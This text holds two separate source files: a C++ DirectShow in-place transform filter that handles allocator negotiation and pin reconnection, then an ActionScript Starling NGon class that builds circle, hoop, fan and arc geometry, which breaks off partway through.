// A: Connect upstream to filter with R-O allocator that insists on using it.
// B: Connect upstream to filter with R-O allocator but chooses not to use it.
// C: Connect upstream to filter with R/W allocator and insists on using it.
// D: Connect upstream to filter with R/W allocator but chooses not to use it.
// E: Connect downstream to a filter that offers an allocator
// F: Connect downstream to a filter that does not offer an allocator
// G: disconnect upstream
// H: Disconnect downstream
//
// A B C D E F G H
// ---------------------------------------------------------
// 00 00 1 | 3 3 2 2 6 5 . . |1 00 00
// <- 00 2 | . . . . *10/11 10 1 . |2 <- 00
// <= 00 3 | . . . . *9/11 *7/8 1 . |3 <= 00
// || 00 4 | . . . . *8 *7 1 . |4 || 00
// 00 || 5 | 8 7 *10 7 . . . 1 |5 00 ||
// 00 -> 6 | 9 11 *10 11 . . . 1 |6 00 ->
// || || 7 | . . . . . . 5 4 |7 || ||
// <= || 8 | . . . . . . 5 3 |8 <= ||
// <= -> 9 | . . . . . . 6 3 |9 <= ->
// <- <- 10| . . . . . . *5/6 2 |10 <- <-
// -> -> 11| . . . . . . 6 *2/3 |11 -> ->
// ---------------------------------------------------------
// A B C D E F G H
//
// All these states are accessible without requiring any filter to
// change its behaviour but not all transitions are accessible, for
// instance a transition from state 4 to anywhere other than
// state 8 requires that the upstream filter first offer a R-O allocator
// and then changes its mind and offer R/W. This is NOT allowable - it
// leads to things like the output pin getting a R/W allocator from
// upstream and then the input pin being told it can only have a R-O one.
// Note that you CAN change (say) the upstream filter for a different one, but
// only as a disconnect / connect, not as a Reconnect. (Exercise for
// the reader is to see how you get into state 4).
//
// The reconnection stuff goes as follows (some of the cases shown here as
// "no reconnect" may get one to finalise media type - an old story).
// If there is a reconnect where it says "no reconnect" here then the
// reconnection must not change the allocator choice.
//
// state 2: <- 00 transition E <- <- case C <- <- (no change)
// case D -> <- and then to -> ->
//
// state 2: <- 00 transition F <- <- (no reconnect)
//
// state 3: <= 00 transition E <= -> case A <= -> (no change)
// case B -> ->
// transition F <= || case A <= || (no change)
// case B || ||
//
// state 4: || 00 transition E || || case B -> || and then all cases to -> ->
// F || || case B || || (no change)
//
// state 5: 00 || transition A <= || (no reconnect)
// B || || (no reconnect)
// C <- || all cases <- <-
// D || || (unfortunate, but upstream's choice)
//
// state 6: 00 -> transition A <= -> (no reconnect)
// B -> -> (no reconnect)
// C <- -> all cases <- <-
// D -> -> (no reconnect)
//
// state 10:<- <- transition G 00 <- case E 00 ->
// case F 00 ||
//
// state 11:-> -> transition H -> 00 case A <= 00 (schizo)
// case B <= 00
// case C <- 00 (schizo)
// case D <- 00
//
// The Rules:
// To sort out media types:
// The input is reconnected
// if the input pin is connected and the output pin connects
// The output is reconnected
// If the output pin is connected
// and the input pin connects to a different media type
//
// To sort out allocators:
// The input is reconnected
// if the output disconnects and the input was using a downstream allocator
// The output pin calls SetAllocator to pass on a new allocator
// if the output is connected and
// if the input disconnects and the output was using an upstream allocator
// if the input acquires an allocator different from the output one
// and that new allocator is not R-O
//
// Data is copied (i.e. call getbuffer and copy the data before transforming it)
// if the two allocators are different.
// CHAINS of filters:
//
// We sit between two filters (call them A and Z). We should finish up
// with the same allocator on both of our pins and that should be the
// same one that A and Z would have agreed on if we hadn't been in the
// way. Furthermore, it should not matter how many in-place transforms
// are in the way. Let B, C, D... be in-place transforms ("us").
// Here's how it goes:
//
// 1.
// A connects to B. They agree on A's allocator.
// A-a->B
//
// 2.
// B connects to C. Same story. There is no point in a reconnect, but
// B will request an input reconnect anyway.
// A-a->B-a->C
//
// 3.
// C connects to Z.
// C insists on using A's allocator, but compromises by requesting a reconnect.
// of C's input.
// A-a->B-?->C-a->Z
//
// We now have pending reconnects on both A--->B and B--->C
//
// 4.
// The A--->B link is reconnected.
// A asks B for an allocator. B sees that it has a downstream connection so
// asks its downstream input pin i.e. C's input pin for an allocator. C sees
// that it too has a downstream connection so asks Z for an allocator.
//
// Even though Z's input pin is connected, it is being asked for an allocator.
// It could refuse, in which case the chain is done and will use A's allocator
// Alternatively, Z may supply one. A chooses either Z's or A's own one.
// B's input pin gets NotifyAllocator called to tell it the decision and it
// propagates this downstream by calling ReceiveAllocator on its output pin
// which calls NotifyAllocator on the next input pin downstream etc.
// If the choice is Z then it goes:
// A-z->B-a->C-a->Z
// A-z->B-z->C-a->Z
// A-z->B-z->C-z->Z
//
// And that's IT!! Any further (essentially spurious) reconnects peter out
// with no change in the chain.
#include <streams.h>
#include <measure.h>
#include <transip.h>
// =================================================================
// Implements the CTransInPlaceFilter class
// =================================================================
CTransInPlaceFilter::CTransInPlaceFilter
( __in_opt LPCTSTR pName,
__inout_opt LPUNKNOWN pUnk,
REFCLSID clsid,
__inout HRESULT *phr,
bool bModifiesData
)
: CTransformFilter(pName, pUnk, clsid),
m_bModifiesData(bModifiesData)
{
#ifdef PERF
RegisterPerfId();
#endif // PERF
} // constructor
#ifdef UNICODE
CTransInPlaceFilter::CTransInPlaceFilter
( __in_opt LPCSTR pName,
__inout_opt LPUNKNOWN pUnk,
REFCLSID clsid,
__inout HRESULT *phr,
bool bModifiesData
)
: CTransformFilter(pName, pUnk, clsid),
m_bModifiesData(bModifiesData)
{
#ifdef PERF
RegisterPerfId();
#endif // PERF
} // constructor
#endif
// return a non-addrefed CBasePin * for the user to addref if he holds onto it
// for longer than his pointer to us. We create the pins dynamically when they
// are asked for rather than in the constructor. This is because we want to
// give the derived class an oppportunity to return different pin objects
// As soon as any pin is needed we create both (this is different from the
// usual transform filter) because enumerators, allocators etc are passed
// through from one pin to another and it becomes very painful if the other
// pin isn't there. If we fail to create either pin we ensure we fail both.
CBasePin *
CTransInPlaceFilter::GetPin(int n)
{
HRESULT hr = S_OK;
// Create an input pin if not already done
if (m_pInput == NULL) {
m_pInput = new CTransInPlaceInputPin( NAME("TransInPlace input pin")
, this // Owner filter
, &hr // Result code
, L"Input" // Pin name
);
// Constructor for CTransInPlaceInputPin can't fail
ASSERT(SUCCEEDED(hr));
}
// Create an output pin if not already done
if (m_pInput!=NULL && m_pOutput == NULL) {
m_pOutput = new CTransInPlaceOutputPin( NAME("TransInPlace output pin")
, this // Owner filter
, &hr // Result code
, L"Output" // Pin name
);
// a failed return code should delete the object
ASSERT(SUCCEEDED(hr));
if (m_pOutput == NULL) {
delete m_pInput;
m_pInput = NULL;
}
}
// Return the appropriate pin
ASSERT (n>=0 && n<=1);
if (n == 0) {
return m_pInput;
} else if (n==1) {
return m_pOutput;
} else {
return NULL;
}
} // GetPin
// dir is the direction of our pin.
// pReceivePin is the pin we are connecting to.
HRESULT CTransInPlaceFilter::CompleteConnect(PIN_DIRECTION dir, IPin *pReceivePin)
{
UNREFERENCED_PARAMETER(pReceivePin);
ASSERT(m_pInput);
ASSERT(m_pOutput);
// if we are not part of a graph, then don't indirect the pointer
// this probably prevents use of the filter without a filtergraph
if (!m_pGraph) {
return VFW_E_NOT_IN_GRAPH;
}
// Always reconnect the input to account for buffering changes
//
// Because we don't get to suggest a type on ReceiveConnection
// we need another way of making sure the right type gets used.
//
// One way would be to have our EnumMediaTypes return our output
// connection type first but more deterministic and simple is to
// call ReconnectEx passing the type we want to reconnect with
// via the base class ReconeectPin method.
if (dir == PINDIR_OUTPUT) {
if( m_pInput->IsConnected() ) {
return ReconnectPin( m_pInput, &m_pOutput->CurrentMediaType() );
}
return NOERROR;
}
ASSERT(dir == PINDIR_INPUT);
// Reconnect output if necessary
if( m_pOutput->IsConnected() ) {
if ( m_pInput->CurrentMediaType()
!= m_pOutput->CurrentMediaType()
) {
return ReconnectPin( m_pOutput, &m_pInput->CurrentMediaType() );
}
}
return NOERROR;
} // ComnpleteConnect
//
// DecideBufferSize
//
// Tell the output pin's allocator what size buffers we require.
// *pAlloc will be the allocator our output pin is using.
//
HRESULT CTransInPlaceFilter::DecideBufferSize
( IMemAllocator *pAlloc
, __inout ALLOCATOR_PROPERTIES *pProperties
)
{
ALLOCATOR_PROPERTIES Request, Actual;
HRESULT hr;
// If we are connected upstream, get his views
if (m_pInput->IsConnected()) {
// Get the input pin allocator, and get its size and count.
// we don't care about his alignment and prefix.
hr = InputPin()->PeekAllocator()->GetProperties(&Request);
if (FAILED(hr)) {
// Input connected but with a secretive allocator - enough!
return hr;
}
} else {
// Propose one byte
// If this isn't enough then when the other pin does get connected
// we can revise it.
ZeroMemory(&Request, sizeof(Request));
Request.cBuffers = 1;
Request.cbBuffer = 1;
}
DbgLog((LOG_MEMORY,1,TEXT("Setting Allocator Requirements")));
DbgLog((LOG_MEMORY,1,TEXT("Count %d, Size %d"),
Request.cBuffers, Request.cbBuffer));
// Pass the allocator requirements to our output side
// but do a little sanity checking first or we'll just hit
// asserts in the allocator.
pProperties->cBuffers = Request.cBuffers;
pProperties->cbBuffer = Request.cbBuffer;
pProperties->cbAlign = Request.cbAlign;
if (pProperties->cBuffers<=0) {pProperties->cBuffers = 1; }
if (pProperties->cbBuffer<=0) {pProperties->cbBuffer = 1; }
hr = pAlloc->SetProperties(pProperties, &Actual);
if (FAILED(hr)) {
return hr;
}
DbgLog((LOG_MEMORY,1,TEXT("Obtained Allocator Requirements")));
DbgLog((LOG_MEMORY,1,TEXT("Count %d, Size %d, Alignment %d"),
Actual.cBuffers, Actual.cbBuffer, Actual.cbAlign));
// Make sure we got the right alignment and at least the minimum required
if ( (Request.cBuffers > Actual.cBuffers)
|| (Request.cbBuffer > Actual.cbBuffer)
|| (Request.cbAlign > Actual.cbAlign)
) {
return E_FAIL;
}
return NOERROR;
} // DecideBufferSize
//
// Copy
//
// return a pointer to an identical copy of pSample
__out_opt IMediaSample * CTransInPlaceFilter::Copy(IMediaSample *pSource)
{
IMediaSample * pDest;
HRESULT hr;
REFERENCE_TIME tStart, tStop;
const BOOL bTime = S_OK == pSource->GetTime( &tStart, &tStop);
// this may block for an indeterminate amount of time
hr = OutputPin()->PeekAllocator()->GetBuffer(
&pDest
, bTime ? &tStart : NULL
, bTime ? &tStop : NULL
, m_bSampleSkipped ? AM_GBF_PREVFRAMESKIPPED : 0
);
if (FAILED(hr)) {
return NULL;
}
ASSERT(pDest);
IMediaSample2 *pSample2;
if (SUCCEEDED(pDest->QueryInterface(IID_IMediaSample2, (void **)&pSample2))) {
HRESULT hrProps = pSample2->SetProperties(
FIELD_OFFSET(AM_SAMPLE2_PROPERTIES, pbBuffer),
(PBYTE)m_pInput->SampleProps());
pSample2->Release();
if (FAILED(hrProps)) {
pDest->Release();
return NULL;
}
} else {
if (bTime) {
pDest->SetTime(&tStart, &tStop);
}
if (S_OK == pSource->IsSyncPoint()) {
pDest->SetSyncPoint(TRUE);
}
if (S_OK == pSource->IsDiscontinuity() || m_bSampleSkipped) {
pDest->SetDiscontinuity(TRUE);
}
if (S_OK == pSource->IsPreroll()) {
pDest->SetPreroll(TRUE);
}
// Copy the media type
AM_MEDIA_TYPE *pMediaType;
if (S_OK == pSource->GetMediaType(&pMediaType)) {
pDest->SetMediaType(pMediaType);
DeleteMediaType( pMediaType );
}
}
m_bSampleSkipped = FALSE;
// Copy the sample media times
REFERENCE_TIME TimeStart, TimeEnd;
if (pSource->GetMediaTime(&TimeStart,&TimeEnd) == NOERROR) {
pDest->SetMediaTime(&TimeStart,&TimeEnd);
}
// Copy the actual data length and the actual data.
{
const long lDataLength = pSource->GetActualDataLength();
if (FAILED(pDest->SetActualDataLength(lDataLength))) {
pDest->Release();
return NULL;
}
// Copy the sample data
{
BYTE *pSourceBuffer, *pDestBuffer;
long lSourceSize = pSource->GetSize();
long lDestSize = pDest->GetSize();
ASSERT(lDestSize >= lSourceSize && lDestSize >= lDataLength);
if (FAILED(pSource->GetPointer(&pSourceBuffer)) ||
FAILED(pDest->GetPointer(&pDestBuffer)) ||
lDestSize < lDataLength ||
lDataLength < 0) {
pDest->Release();
return NULL;
}
ASSERT(lDestSize == 0 || pSourceBuffer != NULL && pDestBuffer != NULL);
CopyMemory( (PVOID) pDestBuffer, (PVOID) pSourceBuffer, lDataLength );
}
}
return pDest;
} // Copy
// override this to customize the transform process
HRESULT
CTransInPlaceFilter::Receive(IMediaSample *pSample)
{
/* Check for other streams and pass them on */
AM_SAMPLE2_PROPERTIES * const pProps = m_pInput->SampleProps();
if (pProps->dwStreamId != AM_STREAM_MEDIA) {
return m_pOutput->Deliver(pSample);
}
HRESULT hr;
// Start timing the TransInPlace (if PERF is defined)
MSR_START(m_idTransInPlace);
if (UsingDifferentAllocators()) {
// We have to copy the data.
pSample = Copy(pSample);
if (pSample==NULL) {
MSR_STOP(m_idTransInPlace);
return E_UNEXPECTED;
}
}
// have the derived class transform the data
hr = Transform(pSample);
// Stop the clock and log it (if PERF is defined)
MSR_STOP(m_idTransInPlace);
if (FAILED(hr)) {
DbgLog((LOG_TRACE, 1, TEXT("Error from TransInPlace")));
if (UsingDifferentAllocators()) {
pSample->Release();
}
return hr;
}
// the Transform() function can return S_FALSE to indicate that the
// sample should not be delivered; we only deliver the sample if it's
// really S_OK (same as NOERROR, of course.)
if (hr == NOERROR) {
hr = m_pOutput->Deliver(pSample);
} else {
// But it would be an error to return this private workaround
// to the caller ...
if (S_FALSE == hr) {
// S_FALSE returned from Transform is a PRIVATE agreement
// We should return NOERROR from Receive() in this cause because
// returning S_FALSE from Receive() means that this is the end
// of the stream and no more data should be sent.
m_bSampleSkipped = TRUE;
if (!m_bQualityChanged) {
NotifyEvent(EC_QUALITY_CHANGE,0,0);
m_bQualityChanged = TRUE;
}
hr = NOERROR;
}
}
// release the output buffer. If the connected pin still needs it,
// it will have addrefed it itself.
if (UsingDifferentAllocators()) {
pSample->Release();
}
return hr;
} // Receive
// =================================================================
// Implements the CTransInPlaceInputPin class
// =================================================================
// constructor
CTransInPlaceInputPin::CTransInPlaceInputPin
( __in_opt LPCTSTR pObjectName
, __inout CTransInPlaceFilter *pFilter
, __inout HRESULT *phr
, __in_opt LPCWSTR pName
)
: CTransformInputPin(pObjectName,
pFilter,
phr,
pName)
, m_bReadOnly(FALSE)
, m_pTIPFilter(pFilter)
{
DbgLog((LOG_TRACE, 2
, TEXT("CTransInPlaceInputPin::CTransInPlaceInputPin")));
} // constructor
// =================================================================
// Implements IMemInputPin interface
// =================================================================
// If the downstream filter has one then offer that (even if our own output
// pin is not using it yet. If the upstream filter chooses it then we will
// tell our output pin to ReceiveAllocator).
// Else if our output pin is using an allocator then offer that.
// ( This could mean offering the upstream filter his own allocator,
// it could mean offerring our own
// ) or it could mean offering the one from downstream
// Else fail to offer any allocator at all.
STDMETHODIMP CTransInPlaceInputPin::GetAllocator(__deref_out IMemAllocator ** ppAllocator)
{
CheckPointer(ppAllocator,E_POINTER);
ValidateReadWritePtr(ppAllocator,sizeof(IMemAllocator *));
CAutoLock cObjectLock(m_pLock);
HRESULT hr;
if ( m_pTIPFilter->m_pOutput->IsConnected() ) {
// Store the allocator we got
hr = m_pTIPFilter->OutputPin()->ConnectedIMemInputPin()
->GetAllocator( ppAllocator );
if (SUCCEEDED(hr)) {
m_pTIPFilter->OutputPin()->SetAllocator( *ppAllocator );
}
}
else {
// Help upstream filter (eg TIP filter which is having to do a copy)
// by providing a temp allocator here - we'll never use
// this allocator because when our output is connected we'll
// reconnect this pin
hr = CTransformInputPin::GetAllocator( ppAllocator );
}
return hr;
} // GetAllocator
/* Get told which allocator the upstream output pin is actually going to use */
STDMETHODIMP
CTransInPlaceInputPin::NotifyAllocator(
IMemAllocator * pAllocator,
BOOL bReadOnly)
{
HRESULT hr = S_OK;
CheckPointer(pAllocator,E_POINTER);
ValidateReadPtr(pAllocator,sizeof(IMemAllocator));
CAutoLock cObjectLock(m_pLock);
m_bReadOnly = bReadOnly;
// If we modify data then don't accept the allocator if it's
// the same as the output pin's allocator
// If our output is not connected just accept the allocator
// We're never going to use this allocator because when our
// output pin is connected we'll reconnect this pin
if (!m_pTIPFilter->OutputPin()->IsConnected()) {
return CTransformInputPin::NotifyAllocator(pAllocator, bReadOnly);
}
// If the allocator is read-only and we're modifying data
// and the allocator is the same as the output pin's
// then reject
if (bReadOnly && m_pTIPFilter->m_bModifiesData) {
IMemAllocator *pOutputAllocator =
m_pTIPFilter->OutputPin()->PeekAllocator();
// Make sure we have an output allocator
if (pOutputAllocator == NULL) {
hr = m_pTIPFilter->OutputPin()->ConnectedIMemInputPin()->
GetAllocator(&pOutputAllocator);
if(FAILED(hr)) {
hr = CreateMemoryAllocator(&pOutputAllocator);
}
if (SUCCEEDED(hr)) {
m_pTIPFilter->OutputPin()->SetAllocator(pOutputAllocator);
pOutputAllocator->Release();
}
}
if (pAllocator == pOutputAllocator) {
hr = E_FAIL;
} else if(SUCCEEDED(hr)) {
// Must copy so set the allocator properties on the output
ALLOCATOR_PROPERTIES Props, Actual;
hr = pAllocator->GetProperties(&Props);
if (SUCCEEDED(hr)) {
hr = pOutputAllocator->SetProperties(&Props, &Actual);
}
if (SUCCEEDED(hr)) {
if ( (Props.cBuffers > Actual.cBuffers)
|| (Props.cbBuffer > Actual.cbBuffer)
|| (Props.cbAlign > Actual.cbAlign)
) {
hr = E_FAIL;
}
}
// Set the allocator on the output pin
if (SUCCEEDED(hr)) {
hr = m_pTIPFilter->OutputPin()->ConnectedIMemInputPin()
->NotifyAllocator( pOutputAllocator, FALSE );
}
}
} else {
hr = m_pTIPFilter->OutputPin()->ConnectedIMemInputPin()
->NotifyAllocator( pAllocator, bReadOnly );
if (SUCCEEDED(hr)) {
m_pTIPFilter->OutputPin()->SetAllocator( pAllocator );
}
}
if (SUCCEEDED(hr)) {
// It's possible that the old and the new are the same thing.
// AddRef before release ensures that we don't unload it.
pAllocator->AddRef();
if( m_pAllocator != NULL )
m_pAllocator->Release();
m_pAllocator = pAllocator; // We have an allocator for the input pin
}
return hr;
} // NotifyAllocator
// EnumMediaTypes
// - pass through to our downstream filter
STDMETHODIMP CTransInPlaceInputPin::EnumMediaTypes( __deref_out IEnumMediaTypes **ppEnum )
{
// Can only pass through if connected
if( !m_pTIPFilter->m_pOutput->IsConnected() )
return VFW_E_NOT_CONNECTED;
return m_pTIPFilter->m_pOutput->GetConnected()->EnumMediaTypes( ppEnum );
} // EnumMediaTypes
// CheckMediaType
// - agree to anything if not connected,
// otherwise pass through to the downstream filter.
// This assumes that the filter does not change the media type.
HRESULT CTransInPlaceInputPin::CheckMediaType(const CMediaType *pmt )
{
HRESULT hr = m_pTIPFilter->CheckInputType(pmt);
if (hr!=S_OK) return hr;
if( m_pTIPFilter->m_pOutput->IsConnected() )
return m_pTIPFilter->m_pOutput->GetConnected()->QueryAccept( pmt );
else
return S_OK;
} // CheckMediaType
// If upstream asks us what our requirements are, we will try to ask downstream
// if that doesn't work, we'll just take the defaults.
STDMETHODIMP
CTransInPlaceInputPin::GetAllocatorRequirements(__out ALLOCATOR_PROPERTIES *pProps)
{
if( m_pTIPFilter->m_pOutput->IsConnected() )
return m_pTIPFilter->OutputPin()
->ConnectedIMemInputPin()->GetAllocatorRequirements( pProps );
else
return E_NOTIMPL;
} // GetAllocatorRequirements
// CTransInPlaceInputPin::CompleteConnect() calls CBaseInputPin::CompleteConnect()
// and then calls CTransInPlaceFilter::CompleteConnect(). It does this because
// CTransInPlaceFilter::CompleteConnect() can reconnect a pin and we do not
// want to reconnect a pin if CBaseInputPin::CompleteConnect() fails.
HRESULT
CTransInPlaceInputPin::CompleteConnect(IPin *pReceivePin)
{
HRESULT hr = CBaseInputPin::CompleteConnect(pReceivePin);
if (FAILED(hr)) {
return hr;
}
return m_pTransformFilter->CompleteConnect(PINDIR_INPUT,pReceivePin);
} // CompleteConnect
// =================================================================
// Implements the CTransInPlaceOutputPin class
// =================================================================
// constructor
CTransInPlaceOutputPin::CTransInPlaceOutputPin(
__in_opt LPCTSTR pObjectName,
__inout CTransInPlaceFilter *pFilter,
__inout HRESULT * phr,
__in_opt LPCWSTR pPinName)
: CTransformOutputPin( pObjectName
, pFilter
, phr
, pPinName),
m_pTIPFilter(pFilter)
{
DbgLog(( LOG_TRACE, 2
, TEXT("CTransInPlaceOutputPin::CTransInPlaceOutputPin")));
} // constructor
// EnumMediaTypes
// - pass through to our upstream filter
STDMETHODIMP CTransInPlaceOutputPin::EnumMediaTypes( __deref_out IEnumMediaTypes **ppEnum )
{
// Can only pass through if connected.
if( ! m_pTIPFilter->m_pInput->IsConnected() )
return VFW_E_NOT_CONNECTED;
return m_pTIPFilter->m_pInput->GetConnected()->EnumMediaTypes( ppEnum );
} // EnumMediaTypes
// CheckMediaType
// - agree to anything if not connected,
// otherwise pass through to the upstream filter.
HRESULT CTransInPlaceOutputPin::CheckMediaType(const CMediaType *pmt )
{
// Don't accept any output pin type changes if we're copying
// between allocators - it's too late to change the input
// allocator size.
if (m_pTIPFilter->UsingDifferentAllocators() && !m_pFilter->IsStopped()) {
if (*pmt == m_mt) {
return S_OK;
} else {
return VFW_E_TYPE_NOT_ACCEPTED;
}
}
// Assumes the type does not change. That's why we're calling
// CheckINPUTType here on the OUTPUT pin.
HRESULT hr = m_pTIPFilter->CheckInputType(pmt);
if (hr!=S_OK) return hr;
if( m_pTIPFilter->m_pInput->IsConnected() )
return m_pTIPFilter->m_pInput->GetConnected()->QueryAccept( pmt );
else
return S_OK;
} // CheckMediaType
/* Save the allocator pointer in the output pin
*/
void
CTransInPlaceOutputPin::SetAllocator(IMemAllocator * pAllocator)
{
pAllocator->AddRef();
if (m_pAllocator) {
m_pAllocator->Release();
}
m_pAllocator = pAllocator;
} // SetAllocator
// CTransInPlaceOutputPin::CompleteConnect() calls CBaseOutputPin::CompleteConnect()
// and then calls CTransInPlaceFilter::CompleteConnect(). It does this because
// CTransInPlaceFilter::CompleteConnect() can reconnect a pin and we do not want to
// reconnect a pin if CBaseOutputPin::CompleteConnect() fails.
// CBaseOutputPin::CompleteConnect() often fails when our output pin is being connected
// to the Video Mixing Renderer.
HRESULT
CTransInPlaceOutputPin::CompleteConnect(IPin *pReceivePin)
{
HRESULT hr = CBaseOutputPin::CompleteConnect(pReceivePin);
if (FAILED(hr)) {
return hr;
}
return m_pTransformFilter->CompleteConnect(PINDIR_OUTPUT,pReceivePin);
} // CompleteConnect
| {
"pile_set_name": "Github"
} |
/*
A fairly versatile primitive capable of representing circles, fans, hoops, and arcs.
Contains a great sin/cos trick learned from Iñigo Quílez's site
http://www.iquilezles.org/www/articles/sincos/sincos.htm
*/
package starling.display.graphics
{
import flash.geom.Matrix;
import flash.geom.Point;
import starling.core.Starling;
import starling.display.graphics.util.TriangleUtil;
public class NGon extends Graphic
{
private const DEGREES_TO_RADIANS :Number = Math.PI / 180;
private var _radius :Number;
private var _innerRadius :Number;
private var _startAngle :Number;
private var _endAngle :Number;
private var _numSides :int;
private var _color :uint = 0xFFFFFF;
private static var _uv :Point;
public function NGon( radius:Number = 100, numSides:int = 10, innerRadius:Number = 0, startAngle:Number = 0, endAngle:Number = 360 )
{
this.radius = radius;
this.numSides = numSides;
this.innerRadius = innerRadius;
this.startAngle = startAngle;
this.endAngle = endAngle;
minBounds.x = minBounds.y = -radius;
maxBounds.x = maxBounds.y = radius;
if ( !_uv )
{
_uv = new Point();
}
}
public function get endAngle():Number
{
return _endAngle;
}
public function set endAngle(value:Number):void
{
_endAngle = value;
setGeometryInvalid();
}
public function get startAngle():Number
{
return _startAngle;
}
public function set startAngle(value:Number):void
{
_startAngle = value;
setGeometryInvalid();
}
public function get radius():Number
{
return _radius;
}
public function set color(value:uint) : void
{
_color = value;
setGeometryInvalid();
}
public function set radius(value:Number):void
{
value = value < 0 ? 0 : value;
_radius = value;
var maxRadius:Number = Math.max(_radius, _innerRadius);
minBounds.x = minBounds.y = -maxRadius;
maxBounds.x = maxBounds.y = maxRadius;
setGeometryInvalid();
}
public function get innerRadius():Number
{
return _innerRadius;
}
public function set innerRadius(value:Number):void
{
value = value < 0 ? 0 : value;
_innerRadius = value;
var maxRadius:Number = Math.max(_radius, _innerRadius);
minBounds.x = minBounds.y = -maxRadius;
maxBounds.x = maxBounds.y = maxRadius;
setGeometryInvalid();
}
public function get numSides():int
{
return _numSides;
}
public function set numSides(value:int):void
{
value = value < 3 ? 3 : value;
_numSides = value;
setGeometryInvalid();
}
override protected function buildGeometry():void
{
vertices = new Vector.<Number>();
indices = new Vector.<uint>();
// Manipulate the input startAngle and endAngle values
// into sa and ea. sa will always end up less than
// ea, and ea-sa is the shortest clockwise distance
// between them.
var sa:Number = _startAngle;
var ea:Number = _endAngle;
var isEqual:Boolean = sa == ea;
var sSign:int = sa < 0 ? -1 : 1;
var eSign:int = ea < 0 ? -1 : 1;
sa *= sSign;
ea *= eSign;
ea = ea % 360;
ea *= eSign;
sa = sa % 360;
if ( ea < sa )
{
ea += 360;
}
sa *= sSign * DEGREES_TO_RADIANS;
ea *= DEGREES_TO_RADIANS;
if ( ea - sa > Math.PI*2 )
{
ea -= Math.PI*2;
}
// Manipulate innerRadius and outRadius in r and ir.
// ir will always be less than r.
var innerRadius:Number = _innerRadius < _radius ? _innerRadius : _radius;
var radius:Number = _radius > _innerRadius ? _radius : _innerRadius;
// Based upon the input values, choose from
// 4 primitive types. Each more complex than the next.
var isSegment:Boolean = (sa != 0 || ea != 0);
if ( isSegment == false )
isSegment = isEqual; // if sa and ea are equal, treat that as a segment, not a full lap around a circle.
if ( innerRadius == 0 && !isSegment )
{
buildSimpleNGon(radius, _numSides, vertices, indices, _uvMatrix , _color);
}
else if ( innerRadius != 0 && !isSegment )
{
buildHoop(innerRadius, radius, _numSides, vertices, indices, _uvMatrix , _color);
}
else if ( innerRadius == 0 )
{
buildFan(radius, sa, ea, _numSides, vertices, indices, _uvMatrix , _color);
}
else
{
buildArc( innerRadius, radius, sa, ea, _numSides, vertices, indices, _uvMatrix , _color);
}
}
override protected function shapeHitTestLocalInternal( localX:Number, localY:Number ):Boolean
{
var numIndices:int = indices.length;
if ( numIndices < 2 )
{
validateNow();
numIndices = indices.length;
if ( numIndices < 2 )
return false;
}
if ( _innerRadius == 0 && _radius > 0 && _startAngle == 0 && _endAngle == 360 && _numSides > 20 )
{ // simple - faster - if ngon is circle shape and numsides more than 20, assume circle is desired.
if ( Math.sqrt( localX * localX + localY * localY ) < _radius )
return true;
return false;
}
for ( var i:int = 2; i < numIndices; i+=3 )
{ // slower version - should be complete though. For all triangles, check if point is in triangle
var i0:int = indices[(i - 2)];
var i1:int = indices[(i - 1)];
var i2:int = indices[(i - 0)];
var v0x:Number = vertices[VERTEX_STRIDE * i0 + 0];
var v0y:Number = vertices[VERTEX_STRIDE * i0 + 1];
var v1x:Number = vertices[VERTEX_STRIDE * i1 + 0];
var v1y:Number = vertices[VERTEX_STRIDE * i1 + 1];
var v2x:Number = vertices[VERTEX_STRIDE * i2 + 0];
var v2y:Number = vertices[VERTEX_STRIDE * i2 + 1];
if ( TriangleUtil.isPointInTriangle(v0x, v0y, v1x, v1y, v2x, v2y, localX, localY) )
return true;
}
return false;
}
private static function buildSimpleNGon( radius:Number, numSides:int, vertices:Vector.<Number>, indices:Vector.<uint>, uvMatrix:Matrix, color:uint ):void
{
var numVertices:int = 0;
_uv.x = 0;
_uv.y = 0;
if ( uvMatrix )
_uv = uvMatrix.transformPoint(_uv);
var r:Number = (color >> 16) / 255;
var g:Number = ((color & 0x00FF00) >> 8) / 255;
var b:Number = (color & 0x0000FF) / 255;
vertices.push( 0, 0, 0, r, g, b, 1, _uv.x, _uv.y );
numVertices++;
var anglePerSide:Number = (Math.PI * 2) / numSides;
var cosA:Number = Math.cos(anglePerSide);
var sinB:Number = Math.sin(anglePerSide);
var s:Number = 0.0;
var c:Number = 1.0;
for ( var i:int = 0; i < numSides; i++ )
{
var x:Number = s * radius;
var y:Number = -c * radius;
_uv.x = x;
_uv.y = y;
if ( uvMatrix )
_uv = uvMatrix.transformPoint(_uv);
vertices.push( x, y, 0, r, g, b, 1, _uv.x, _uv.y );
numVertices++;
indices.push( 0, numVertices-1, i == numSides-1 ? 1 : numVertices );
const ns:Number = sinB*c + cosA*s;
const nc:Number = cosA*c - sinB*s;
c = nc;
s = ns;
}
}
private static function buildHoop( innerRadius:Number, radius:Number, numSides:int, vertices:Vector.<Number>, indices:Vector.<uint>, uvMatrix:Matrix , color:uint):void
{
var numVertices:int = 0;
var anglePerSide:Number = (Math.PI * 2) / numSides;
var cosA:Number = Math.cos(anglePerSide);
var sinB:Number = Math.sin(anglePerSide);
var s:Number = 0.0;
var c:Number = 1.0;
var r:Number = (color >> 16) / 255;
var g:Number = ((color & 0x00FF00) >> 8) / 255;
var b:Number = (color & 0x0000FF) / 255;
for ( var i:int = 0; i < numSides; i++ )
{
var x:Number = s * radius;
var y:Number = -c * radius;
_uv.x = x;
_uv.y = y;
if ( uvMatrix )
_uv = uvMatrix.transformPoint(_uv);
vertices.push( x, y, 0, r, g, b, 1, _uv.x, _uv.y );
numVertices++;
x = s * innerRadius;
y = -c * innerRadius;
_uv.x = x;
_uv.y = y;
if ( uvMatrix )
_uv = uvMatrix.transformPoint(_uv);
vertices.push( x, y, 0, r, g, b, 1, _uv.x, _uv.y );
numVertices++;
if ( i == numSides-1 )
{
indices.push( numVertices-2, numVertices-1, 0, 0, numVertices-1, 1 );
}
else
{
indices.push( numVertices - 2, numVertices , numVertices-1, numVertices, numVertices + 1, numVertices - 1 );
}
const ns:Number = sinB*c + cosA*s;
const nc:Number = cosA*c - sinB*s;
c = nc;
s = ns;
}
}
private static function buildFan( radius:Number, startAngle:Number, endAngle:Number, numSides:int, vertices:Vector.<Number>, indices:Vector.<uint>, uvMatrix:Matrix , color:uint):void
{
var numVertices:int = 0;
var r:Number = (color >> 16) / 255;
var g:Number = ((color & 0x00FF00) >> 8) / 255;
var b:Number = (color & 0x0000FF) / 255;
vertices.push( 0, 0, 0, r, g, b, 1, 0.5, 0.5 );
numVertices++;
var radiansPerDivision:Number = (Math.PI * 2) / numSides;
